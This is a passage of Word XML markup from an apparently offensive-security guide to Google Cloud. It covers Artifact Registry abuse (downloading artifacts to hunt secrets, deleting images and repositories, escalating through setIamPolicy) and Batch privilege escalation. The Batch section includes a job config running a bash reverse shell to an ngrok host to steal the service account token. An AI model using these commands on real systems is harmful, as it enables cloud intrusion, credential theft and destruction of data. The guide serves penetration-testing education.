        <w:numPr>
          <w:ilvl w:val="1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Inside your package directory, create an </w:t>
      </w:r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__init__.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> file. This file can be empty or can contain initializations for your package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A885A19" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:pPr>
        <w:pStyle w:val="leading-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ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF559C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mkdir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hello_world_library</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E8137DF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cd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hello_world_library</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E496264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mkdir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hello_world</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1050844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Fonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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touch hello_world/__init__.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEE50B5" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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Write your library code</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009B1835" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/>
        <w:numPr>
          <w:ilvl w:val="1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Inside the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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hello_world</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> directory, create a new Python file for your module, e.g., </w:t>
      </w:r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greet.py</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FC64D2" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/>
        <w:numPr>
          <w:ilvl w:val="1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Write your "Hello, World!" function:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B4B5A3" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:pPr>
        <w:pStyle w:val="leading-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ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A9225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hello_world/greet.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5397C55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def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say_</w:t>
      </w:r>
      <w:proofErr w:type="gram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hello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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007B657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Fonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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return "Hello, World!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F14B0C" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/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 xml:space="preserve">Create a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>setup.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD8CEA5" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/>
        <w:numPr>
          <w:ilvl w:val="1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In the root of your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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hello_world_library</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> directory, create a </w:t>
      </w:r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setup.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477C79A1" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/>
        <w:numPr>
          <w:ilvl w:val="1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>This file contains metadata about your library and tells Python how to install it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D52E417" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:pPr>
        <w:pStyle w:val="leading-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ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40050E9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setup.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0D6E3B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from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setuptools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import setup,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find_</w:t>
      </w:r>
      <w:proofErr w:type="gram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packages</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="274A89D4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71964CE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setup(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2E1201C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name='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hello_world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',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DC104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version='0.1',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6968D5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packages=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find_</w:t>
      </w:r>
      <w:proofErr w:type="gram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packages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),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E78294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install_requires</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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=[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6689416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# Any dependencies your library needs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9E095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],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDA40E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Fonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF8AB05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rPr>
          <w:rStyle w:val="Strong"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>lets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> upload the library:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C5B523" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/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Build your package</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC2BCC8" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/>
        <w:numPr>
          <w:ilvl w:val="1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From the root of your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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hello_world_library</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> directory, run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD11FEB" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:pPr>
        <w:pStyle w:val="leading-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ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC25D5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Fonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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python3 setup.py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sdist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bdist_wheel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04841D84" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/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>Configure authentication for twine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (used to upload your package):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6CFFEF" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/>
        <w:numPr>
          <w:ilvl w:val="1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Ensure you have </w:t>
      </w:r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twine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> installed (</w:t>
      </w:r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pip install twine</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA34964" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/>
        <w:numPr>
          <w:ilvl w:val="1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t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>gcloud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to configure credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36436BCD" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:r>
        <w:t>Copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538B75A8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```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</w:p>
    <w:p w14:paraId="282D943C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twine upload --username 'oauth2accesstoken' --password "$(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auth print-access-token)" --repository-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url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https://&lt;location&gt;-python.pkg.dev/&lt;project-id&gt;/&lt;repo-name&gt;/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dist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/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779C9257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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA71DEC" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/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>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Clean the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>build</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4233CC90" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:r>
        <w:t>Copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583B8462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rm -rf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dist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build </w:t>
      </w:r>
      <w:proofErr w:type="spell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hello_world.egg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w: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info</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7E5275CB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It's not possible to upload a python library with the same version as the one already present, but it's possible to upload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greater versions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or add an extra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.0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at the end</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the version if that works -not in python though-), or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delete the last version an upload a new one with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> (needed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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artifactregistry.versions</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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.delete</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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)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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7DF6EA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477646C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artifacts versions delete &lt;version&gt; --repository=&lt;repo-name&gt; --location=&lt;location&gt; --package=&lt;lib-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F850221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artifactregistry.repositories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.downloadArtifacts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4CAF5F50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With this permission you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download artifacts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> and search for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sensitive information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vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE86A28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Download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Docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> image:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353D8887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4AB709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Configure docker to use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to authenticate with Artifact Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100B50FC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configure-docker &lt;location&gt;-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docker.pkg.dev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D2E9E4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079DAC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Dowload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image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCA38B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docker pull &lt;location&gt;-docker.pkg.dev/&lt;proj-name&gt;/&lt;repo-name&gt;/&lt;img-name&gt;:&lt;tag&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EDAD93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Download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python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> library:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2628C123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486224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pip install &lt;lib-name&gt; --index-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url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"https://oauth2accesstoken:$(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print-access-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token)@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&lt;location&gt;-python.pkg.dev/&lt;project-id&gt;/&lt;repo-name&gt;/simple/" --trusted-host &lt;location&gt;-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python.pkg.dev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--no-cache-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dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="28DE9B7F" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/>
        <w:numPr>
          <w:ilvl w:val="0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What happens if a remote and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>a standard registries</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> are mixed in a virtual one and a package exists in both? Check this page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F002176" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId91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sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>GCP - Artifact Registry Persistence</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4310B343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artifactregistry.tags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.delete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artifactregistry.versions.delete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artifactregistry.packages.delete</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>, (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artifactregistry.repositories.get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artifactregistry.tags.get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artifactregistry.tags.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B9F3DE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Delete artifacts from the registry, like docker images:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CD8661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1A9257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Delete a docker image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510EDAC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artifacts docker images delete &lt;location&gt;-docker.pkg.dev/&lt;proj-name&gt;/&lt;repo-name&gt;/&lt;img-name&gt;:&lt;tag&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EB3BD7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artifactregistry.repositories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.delete</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7863739B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Detele</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> a full repository (even if it has content):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A56EC9C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3BFD45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artifacts repositories delete &lt;repo-name&gt; --location=&lt;location&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41420C3C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artifactregistry.repositories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.setIamPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1DDC3297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attacker with this permission could give himself permissions to perform some of the previously mentioned repository attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C528B2F" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669"/>
    <w:p w14:paraId="53698A63" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C266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 xml:space="preserve">GCP - Batch </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="21B79E32" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669"/>
    <w:p w14:paraId="619F9B16" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C266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Batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430D83E4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Basic information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7889A70E" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId92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sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>GCP - Batch Enum</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="53DAAD22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batch.</w:t>
      </w:r>
      <w:proofErr w:type="gram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jobs.create</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>iam.serviceAccounts.actAs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0730E4AC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It's possible to create a batch job, get a reverse shell and exfiltrate the metadata token of the SA (compute SA by default).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C13C80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Copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053AE62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beta batch jobs submit job-lxo3b2ub --location us-east1 --config - &lt;&lt;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EOD</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3F9D009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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052BD20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"name": "projects/gcp-labs-35jfenjy/locations/us-central1/jobs/job-lxo3b2ub",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D255372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taskGroups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[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFF34C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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289778C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taskCount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"1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56021C2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"parallelism": "1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FEC92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taskSpec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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E78A85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computeResource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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DF58D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cpuMilli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"1000",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44600945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memoryMib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"512"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33507BC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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A84CD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runnables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[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2099AB8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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425538F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"script": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7687E2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"text": "/bin/bash -c 'bash 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&gt;&amp; /dev/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tcp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/8.tcp.ngrok.io/10396 0&gt;&amp;1'\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1047DF7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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305597F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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB3217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],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1916AF9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"volumes": []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1659F40B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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F3FD7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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124FDCA2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],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCFE5E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allocationPolicy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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB2B6F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"instances": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5921ED7B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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A07A1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"policy": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7878F8E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provisioningModel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"STANDARD",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F2B93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machineType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"e2-micro"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B895C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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4157A7FF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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD4C94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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3039F13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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E6ED8C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logsPolicy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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B33DA4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"destination": "CLOUD_LOGGING"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4A3F32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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6733D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14:paraId="783B737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EOD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40796078" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C266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lastRenderedPageBreak/>
        <w:t xml:space="preserve">GCP - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>BigQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="243B6999" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>BigQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="164EE4C8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For more information about </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>BigQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> check:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAB8A18" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId93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sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t xml:space="preserve">GCP - </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="text-base"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>Bigquery</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="text-base"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t xml:space="preserve"> Enum</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2EDDB8D3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Read Table</w:t>
      </w:r>
